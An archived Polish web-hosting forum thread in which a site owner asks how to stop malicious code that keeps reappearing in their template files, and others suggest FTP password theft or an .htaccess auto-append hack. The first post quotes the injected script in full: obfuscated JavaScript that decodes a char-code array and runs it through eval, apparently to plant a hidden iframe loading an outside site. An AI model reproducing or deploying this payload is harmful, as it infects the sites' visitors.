Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Doklejany kod do plików
Forum PHP.pl > Forum > Serwery WWW
aplek
27.03.2013, 00:03:52
Witam, od pewnego czasu mam problem na stronie nie wiem skąd dokleja mi się kod (VIRUS) do streony :

[HTML] pobierz, plaintext 
  1. <script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035
    ,035,035,035,0163,0136,0157,035,0161,0167,0153,035,072,035,0141,0154,0140,0162,01
    52,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153
    ,0161,045,044,0146,0143,0157,0136,0152,0142,044,046,070,012,07,012,07,035,035,035
    ,035,0161,0167,0153,053,0160,0157,0140,035,072,035,044,0145,0161,0161,0155,067,05
    4,054,0153,0154,0140,0151,0142,0144,0146,0150,0157,0136,0147,0153,0154,053,0153,0
    142,0161,054,0140,0151,0150,053,0155,0145,0155,044,070,012,07,035,035,035,035,016
    1,0167,0153,053,0160,0161,0166,0151,0142,053,0155,0154,0160,0146,0161,0146,0154,0
    153,035,072,035,044,0136,0137,0160,0154,0151,0162,0161,0142,044,070,012,07,035,03
    5,035,035,0161,0167,0153,053,0160,0161,0166,0151,0142,053,0137,0154,0157,0141,014
    2,0157,035,072,035,044,055,044,070,012,07,035,035,035,035,0161,0167,0153,053,0160
    ,0161,0166,0151,0142,053,0145,0142,0146,0144,0145,0161,035,072,035,044,056,0155,0
    165,044,070,012,07,035,035,035,035,0161,0167,0153,053,0160,0161,0166,0151,0142,05
    3,0164,0146,0141,0161,0145,035,072,035,044,056,0155,0165,044,070,012,07,035,035,0
    35,035,0161,0167,0153,053,0160,0161,0166,0151,0142,053,0151,0142,0143,0161,035,07
    2,035,044,056,0155,0165,044,070,012,07,035,035,035,035,0161,0167,0153,053,0160,01
    61,0166,0151,0142,053,0161,0154,0155,035,072,035,044,056,0155,0165,044,070,012,07
    ,012,07,035,035,035,035,0146,0143,035,045,036,0141,0154,0140,0162,0152,0142,0153,
    0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045
    ,044,0161,0167,0153,044,046,046,035,0170,012,07,035,035,035,035,035,035,035,035,0
    141,0154,0140,0162,0152,0142,0153,0161,053,0164,0157,0146,0161,0142,045,044,071,0
    141,0146,0163,035,0146,0141,072,0131,044,0161,0167,0153,0131,044,073,071,054,0141
    ,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,
    0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,07
    7,0166,0106,0141,045,044,0161,0167,0153,044,046,053,0136,0155,0155,0142,0153,0141
    ,0100,0145,0146,0151,0141,045,0161,0167,0153,046,070,012,07,035,035,035,035,0172,
    012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+470!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}</script><!--/8f4d8e-->
[HTML] pobierz, plaintext


Jak się przed tym zabezpieczyć ?
Jak nadać prawo plikom *.tpl do nie zapisywania ?
PrinceOfPersia
27.03.2013, 09:34:41
licho go wie... miałem kiedyś taką sytuację na jednym serwerze, że w .htaccess było coś w stylu "auto_append_file" i wszystkie pliki automatycznie zainfekowało.
!*!
27.03.2013, 09:38:06
Temat był wałkowany, więcej niż setkę razy. Poszukaj pod frazami "włamanie na stronę/serwer, zapamiętanie haseł, total commander".
aplek
27.03.2013, 21:20:16
Dałem htacces nic, uwaliłem ftpa, zobaczymy może zmieni, co najlepsze, kasuje jeden plik, a on znów się pojawia.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.